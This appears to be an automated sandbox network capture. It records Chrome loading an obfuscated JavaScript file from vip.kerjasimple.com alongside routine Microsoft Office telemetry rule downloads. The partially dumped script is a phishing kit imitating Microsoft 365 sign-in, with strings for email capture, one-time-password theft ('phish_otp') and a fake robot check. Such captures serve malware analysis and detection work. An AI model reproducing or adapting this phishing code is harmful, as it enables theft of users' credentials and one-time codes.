                                                        2024-11-12 15:27:01 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.649723159.89.194.494436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:01 UTC663OUTGET /m/jsv.js HTTP/1.1
                                                        Host: vip.kerjasimple.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: _cid=5f71965d2c5dc4b3564f21c2f63a98cd
                                                        2024-11-12 15:27:01 UTC517INHTTP/1.1 200 OK
                                                        cache-control: public, max-age=604800
                                                        expires: Tue, 19 Nov 2024 15:27:01 GMT
                                                        etag: "1da7f-672e5764-17a200;;;"
                                                        last-modified: Fri, 08 Nov 2024 18:24:36 GMT
                                                        content-type: application/x-javascript
                                                        content-length: 121471
                                                        accept-ranges: bytes
                                                        date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        connection: close
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 32 37 36 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 35 65 64 39 34 34 20 3d 20 5b 27 68 72 65 66 27 2c 20 27 2e 70 68 6f 6e 65 6f 74 70 54 65 78 74 27 2c 20 27 72 65 61 64 79 53 74 61 74 65 27 2c 20 27 23 70 6c 61 79 6d 65 5f 62 69 67 27 2c 20 27 40 69 6f 6e 6f 73 2e 27 2c 20 27 23 70 6c 61 79 6d 65 27 2c 20 27 72 65 73 69 7a 65 27 2c 20 27 73 32 63 5f 72 65 73 74 61 72 74 27 2c 20 27 2e 6c 6f 61 64 65 72 78 42 6c 6f 63 6b 31 31 27 2c 20 27 73 32 63 27 2c 20 27 63 6f 6d 70 6c 65 74 65 27 2c 20 27 4f 33 36 35 27 2c 20 27 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 62 61 63
                                                        Data Ascii: function _0xb276() { const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/bac
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 65 6d 61 69 6c 4c 61 62 65 6c 5c 78 32 32 3e 65 6d 61 69 6c 40 67 6d 61 69 6c 2e 63 6f 6d 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 62 72 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 73 69 67 6e
                                                        Data Ascii: x20<a\x20class=\x22emailLabel\x22>email@gmail.com</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<br>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20class=\x22sign
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 20 27 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 2c 20 27 62 72 6f 77 73 65 72 4c 61 6e 67 75 61 67 65 27 2c 20 27 70 68 69 73 68 5f 6f 74 70 27 2c 20 27 65 6d 61 69 6c 27 2c 20 27 68 74 6d 6c 27 2c 20 27 62 61 6e 6e 65 72 4c 6f 67 6f 27 2c 20 27 6f 6e 72 65 73 69 7a 65 27 2c 20 27 4c 44 31 31 27 2c 20 27 40 61 6f 6c 2e 27 2c 20 27 2e 62 67 5f 69 6d 61 67 65 5f 64 69 76 27 2c 20 27 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 6d 65 74 61 5c 78 32 30 63 68 61 72 73 65 74 3d 5c 78 32 32 55 54 46 2d 38 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 6d 65 74 61 5c 78 32 30 68 74 74 70 2d 65 71 75 69 76 3d 5c 78 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 5c 78 32 32 5c 78 32 30 63 6f 6e 74 65 6e 74 3d
                                                        Data Ascii: 'preventDefault', 'browserLanguage', 'phish_otp', 'email', 'html', 'bannerLogo', 'onresize', 'LD11', '@aol.', '.bg_image_div', '\x0a\x20\x20\x20\x20<meta\x20charset=\x22UTF-8\x22>\x0a\x20\x20\x20\x20<meta\x20http-equiv=\x22X-UA-Compatible\x22\x20content=
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 31 30 30 76 68 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 30 30 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 5c 78 32 30 31 30 30 25 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2f 2a 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 5c 78 32 30 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f
                                                        Data Ascii: x20\x20height:\x20100vh;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#000000;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-size:\x20100%\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20/*\x20background-image:\x20url(\x27https://aadcdn.msauth.net/
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 5c 78 32 30 73 6f 6c 69 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 5c 78 32 30 30 70 78 5c 78 32 30 30 70 78 5c 78 32 30 31 70 78 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 5c 78 32 30 6c 69 67 68 74 67 72 61 79 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 34 33 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                        Data Ascii: 0\x20\x20border-style:\x20solid;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-width:\x200px\x200px\x201px\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-color:\x20lightgray;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x2043px;\x0a\x20\x20\x20\x20\x20\x20\x
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 6c 61 79 3a 5c 78 32 30 66 6c 65 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 61 6d 6e 6f 74 72 6f 62 6f 74 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 2d 37 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32
                                                        Data Ascii: lay:\x20flex;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x2010px;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.amnotrobot\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20-70px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x2
                                                        2024-11-12 15:27:02 UTC16384INData Raw: 29 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 27 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 5d 28 5f 30 78 35 64 35 35 39 63 28 30 78 31 36 31 29 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 5f 30 78 35 64 35 35 39 63 28 30 78 31 62 63 29 5d 28 27 6d 6f 75 73 65 6d 6f 76 65 27 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 5f 30 78 35 64 35 35 39 63 28 30 78 31 62 63 29 5d 28 5f 30 78 35 64 35 35 39 63 28 30 78 31 36 63 29 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 5f 30 78 35 64 35 35 39 63 28 30 78 31 62 63 29 5d 28 5f 30 78 35 64 35 35 39 63 28 30 78 31 64 31 29 2c 20 5f 30 78 31 63 37 30 65 63 29 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30
                                                        Data Ascii: ), _0x1c70ec), window['addEventListener'](_0x5d559c(0x161), _0x1c70ec), window[_0x5d559c(0x1bc)]('mousemove', _0x1c70ec), window[_0x5d559c(0x1bc)](_0x5d559c(0x16c), _0x1c70ec), window[_0x5d559c(0x1bc)](_0x5d559c(0x1d1), _0x1c70ec)); }()); const _0
                                                        2024-11-12 15:27:02 UTC6783INData Raw: 28 29 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 38 32 29 5d 28 5f 30 78 35 32 35 34 31 30 28 30 78 31 35 66 29 29 20 7c 7c 20 5f 30 78 33 39 39 30 62 33 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 66 31 29 5d 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 36 39 29 5d 28 29 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 38 32 29 5d 28 5f 30 78 35 32 35 34 31 30 28 30 78 31 65 39 29 29 20 7c 7c 20 5f 30 78 33 39 39 30 62 33 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 66 31 29 5d 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 36 39 29 5d 28 29 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 38 32 29 5d 28 5f 30 78 35 32 35 34 31 30 28 30 78 31 36 38 29 29 20 7c 7c 20 5f 30 78 33 39 39 30 62 33 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 66 31 29 5d 5b 5f 30 78 35 32 35 34 31 30 28 30
                                                        Data Ascii: ()[_0x525410(0x182)](_0x525410(0x15f)) || _0x3990b3[_0x525410(0x1f1)][_0x525410(0x169)]()[_0x525410(0x182)](_0x525410(0x1e9)) || _0x3990b3[_0x525410(0x1f1)][_0x525410(0x169)]()[_0x525410(0x182)](_0x525410(0x168)) || _0x3990b3[_0x525410(0x1f1)][_0x525410(0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.64973213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:01 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:01 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 415
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                        ETag: "0x8DC582B9F6F3512"
                                                        x-ms-request-id: 6d3b9569-701e-0001-03a2-34b110000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152701Z-17df447cdb5km9skhC1DFWy2rc0000000ct0000000002rsg
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.64973313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:01 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:01 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 471
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                        ETag: "0x8DC582BB10C598B"
                                                        x-ms-request-id: 42046764-d01e-0028-78a2-347896000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152701Z-17df447cdb5vp9l9hC1DFW5hw800000007qg00000000esxd
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:01 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.64973413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:01 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:01 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 632
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                        ETag: "0x8DC582BB6E3779E"
                                                        x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152701Z-16547b76f7fknvdnhC1DFWxnys0000000fwg000000008w5y
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:01 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.64973513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:01 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:01 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:01 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 467
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                        ETag: "0x8DC582BA6C038BC"
                                                        x-ms-request-id: a35867fd-a01e-000d-5aa0-34d1ea000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152701Z-17df447cdb5fh5hghC1DFWam04000000095000000000czeq
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:01 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.64973713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:02 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:02 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:02 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 407
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                        ETag: "0x8DC582BBAD04B7B"
                                                        x-ms-request-id: a35c6270-a01e-000d-47a1-34d1ea000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152702Z-17df447cdb5g2j9ghC1DFWuyag000000069000000000emuw
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.64973618.245.31.54436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:02 UTC572OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://vip.kerjasimple.com
                                                        sec-ch-ua-mobile: ?0
